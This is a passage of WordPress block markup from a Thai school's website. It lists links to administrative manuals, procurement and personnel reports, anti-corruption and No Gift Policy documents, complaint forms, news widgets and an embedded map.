data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 